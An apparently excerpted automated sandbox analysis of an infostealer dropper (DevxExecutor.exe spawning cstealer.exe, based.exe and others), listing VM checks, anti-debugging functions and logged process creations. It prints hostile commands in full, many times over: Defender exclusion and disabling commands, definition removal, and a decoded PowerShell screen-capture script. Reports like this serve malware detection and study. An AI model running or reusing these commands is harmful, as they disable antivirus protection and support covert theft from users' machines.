                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: System32\vmGuestLib.dllz
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: System32\vmGuestLib.dll
                                Source: cstealer.exe, 00000009.00000003.2288716798.0000020102D84000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx$
                                Source: cstealer.exe, 00000003.00000003.2173753474.00000271D9E73000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2628303853.00000271D9E83000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2495003008.00000271D9E7F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2553076024.00000271D9E82000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2178442107.00000271D9E64000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2550902287.00000271D9E80000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2484503329.00000271D9E7D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2443036423.00000271D9E7C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177316384.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWq
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vboxmrxnp.dllr
                                Note: vmGuestLib.dll is the VMware guest SDK library and vboxmrxnp.dll the VirtualBox shared-folder network provider; a process holding both paths in memory is checking for guest-tools artefacts, which is a genuine hypervisor check. "Hyper-V RAW", by contrast, is the display name of the AF_HYPERV Winsock protocol entry that mswsock.dll registers on every current Windows installation, so its appearance next to the mswsock.dll path reflects Winsock catalog enumeration (socket setup) and is not on its own evidence of a Hyper-V check.
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxmrxnp.dll
                                Source: cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWARE
                                Source: cstealer.exe, 00000009.00000002.2327444182.0000020102D84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                                Source: cstealer.exe, 00000009.00000003.2278585948.0000020102D84000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102D84000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219015492.0000020102D84000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102D84000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2214237869.0000020102D75000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102D84000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215808528.0000020102D84000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212719399.0000020102D7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

                                Anti Debugging

                                Source: C:\ProgramData\svchost.exe - Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 9_2_00007FF8A803572C 9_2_00007FF8A803572C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 9_2_00007FF8A8034241 9_2_00007FF8A8034241
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 9_2_00007FF8A80332F6 rdtsc 9_2_00007FF8A80332F6
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 3_2_00000271DC677D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00000271DC677D90
                                Source: C:\Users\user\AppData\Local\Temp\main.exe - Code function: 8_2_00007FF8A8F28610 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 8_2_00007FF8A8F28610
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 3_2_00000271DC671628 GetProcessHeap,HeapAlloc,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegCloseKey, 3_2_00000271DC671628
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
                                Source: C:\Windows\System32\tasklist.exe - Process token adjusted: Debug
                                Source: C:\Windows\System32\tasklist.exe - Process token adjusted: Debug
                                Source: C:\ProgramData\main.exe - Process token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
                                Source: C:\Windows\System32\tasklist.exe - Process token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
                                Source: C:\Windows\System32\tasklist.exe - Process token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 3_2_00000271DC677D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00000271DC677D90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 3_2_00000271DC67D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00000271DC67D2A4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 3_2_00007FF6957EC8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00007FF6957EC8BC
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 3_2_00007FF6957EC030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00007FF6957EC030
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 3_2_00007FF6957ECA9C SetUnhandledExceptionFilter, 3_2_00007FF6957ECA9C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 3_2_00007FF6957FB3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00007FF6957FB3CC
                                Source: C:\Users\user\AppData\Local\Temp\main.exe - Code function: 4_2_00007FF6D6E9C030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00007FF6D6E9C030
                                Source: C:\Users\user\AppData\Local\Temp\main.exe - Code function: 4_2_00007FF6D6E9C8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF6D6E9C8BC
                                Source: C:\Users\user\AppData\Local\Temp\main.exe - Code function: 4_2_00007FF6D6EAB3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF6D6EAB3CC
                                Source: C:\Users\user\AppData\Local\Temp\main.exe - Code function: 4_2_00007FF6D6E9CA9C SetUnhandledExceptionFilter, 4_2_00007FF6D6E9CA9C
                                Source: C:\Windows\System32\cmd.exe - Code function: 5_2_00000230D9217D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00000230D9217D90
                                Source: C:\Windows\System32\cmd.exe - Code function: 5_2_00000230D921D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00000230D921D2A4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 7_2_0000014E7128D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0000014E7128D2A4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 7_2_0000014E71287D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0000014E71287D90
                                Source: C:\Users\user\AppData\Local\Temp\main.exe - Code function: 8_2_00007FF8BA250338 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8BA250338
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 9_2_00007FF8A7EC8000 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_00007FF8A7EC8000
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 9_2_00007FF8A7F12A60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_00007FF8A7F12A60
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 9_2_00007FF8A7F13028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00007FF8A7F13028
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 9_2_00007FF8A8035A1F IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00007FF8A8035A1F
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 9_2_00007FF8B7E3B360 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_00007FF8B7E3B360
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Code function: 9_2_00007FF8B7E3B930 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00007FF8B7E3B930
                                Source: C:\Users\user\Desktop\DevxExecutor.exe - Memory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'"
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
                                Source: unknown - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'"
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
                                Source: C:\ProgramData\setup.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: C:\Windows\System32\cmd.exe - Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                                Source: C:\Windows\System32\cmd.exe - Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                                Source: C:\ProgramData\setup.exe - NtQuerySystemInformation: Direct from: 0x7FF7586842AE
                                Source: C:\ProgramData\setup.exe - Section loaded: NULL target: unknown protection: readonly
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\ProgramData\setup.exe - Thread register set: target process: 8740
                                Source: C:\ProgramData\svchost.exe - Thread register set: target process: 8104
                                Source: C:\ProgramData\svchost.exe - Thread register set: target process: 8104
                                Source: C:\ProgramData\svchost.exe - Thread register set: target process: 8104
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\setup.exe - Memory written: C:\Windows\System32\dialer.exe base: 76FFEA5010
                                Source: C:\Users\user\Desktop\DevxExecutor.exe - Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe"
                                Source: C:\Users\user\Desktop\DevxExecutor.exe - Process created: C:\Users\user\AppData\Local\Temp\main.exe "C:\Users\user\AppData\Local\Temp\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe"
